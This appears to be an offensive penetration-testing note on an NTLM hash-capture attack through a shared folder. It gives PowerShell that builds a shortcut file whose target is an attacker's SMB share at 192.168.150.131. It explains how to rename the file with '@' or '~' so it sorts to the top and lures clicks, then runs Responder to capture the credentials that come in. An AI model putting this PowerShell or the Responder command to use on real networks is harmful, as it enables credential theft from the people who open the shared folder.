Placing a malicious file in a shared folder can lead to some great results!

Creating the File

$objShell = New-Object -ComObject WScript.shell
$lnk = $objShell.CreateShortcut("C:\\test.lnk")
$lnk.TargetPath = "\\\\192.168.150.131\\@test.png"
$lnk.WindowStyle = 1
$lnk.IconLocation = "%windir%\\system32\\shell32.dll, 3"
$lnk.Description = "Test"
$lnk.HotKey = "Ctrl+Alt+T"
$lnk.Save()

• $objShell = New-Object -ComObject WScript.shell

  • Creates a new instance of the WScript.Shell COM object, which allows interaction with Windows shell features, such as creating shortcuts.

• $lnk = $objShell.CreateShortcut("C:\\test.lnk")

  • Creates a new shortcut file (test.lnk) in the C:\\ directory.

• $lnk.TargetPath = "\\\\192.168.150.131\\@test.png"

  • Sets the target of the shortcut to a remote file (@test.png) hosted on a network share at 192.168.150.131 - the attacker’s machine.
  • When the shortcut is opened, it will try to access this network resource.

• $lnk.WindowStyle = 1

  • Defines the window style when opening the shortcut. 1 means it will open in a normal window.

• $lnk.IconLocation = "%windir%\\system32\\shell32.dll, 3"

  • Specifies the icon for the shortcut.
  • %windir%\\system32\\shell32.dll, 3 refers to the third icon inside the shell32.dll library.

• $lnk.Description = "Test"

  • Sets the description of the shortcut, which appears in the tooltip when you hover over it.

• $lnk.HotKey = "Ctrl+Alt+T"

  • Assigns a keyboard shortcut (Ctrl + Alt + T) to open the shortcut.

• $lnk.Save()

  • Saves the shortcut file with all the defined properties.

• After all this is done, add ‘@’ or ‘~’ in front of the test.lnk file

  The ~@ prefix ensures the file appears as one of the first items when viewed in File Explorer

  

<aside> 💡

• Sorting Order in File Explorer

  • Windows generally sorts files in ASCII order where symbols (like @ and ~) come before letters and numbers.
  • This means files named @filename.lnk or ~filename.lnk will appear before files that start with letters (A-Z or a-z) in alphabetical order.

• Start Menu & Desktop Shortcut Priority

  • In some cases, when sorting shortcuts in Start Menu or Desktop, files with symbols (@, ~) may be placed at the top of the list.
  • This is useful if you want a shortcut to be more visible or accessible quickly.

• Exploitation Techniques

  • Attackers sometimes use this trick to place malicious shortcuts (.lnk files) at the top of a directory, making it more likely that a user will click on it.
  • If a user navigates to a network share (like in your script example), a file named @test.png could be at the top, increasing the chances of a user interacting with it. </aside>

Wait for An Event

• After all this is done, set up Responder in the attacker machine and wait.

  sudo responder -I eth0 -dPv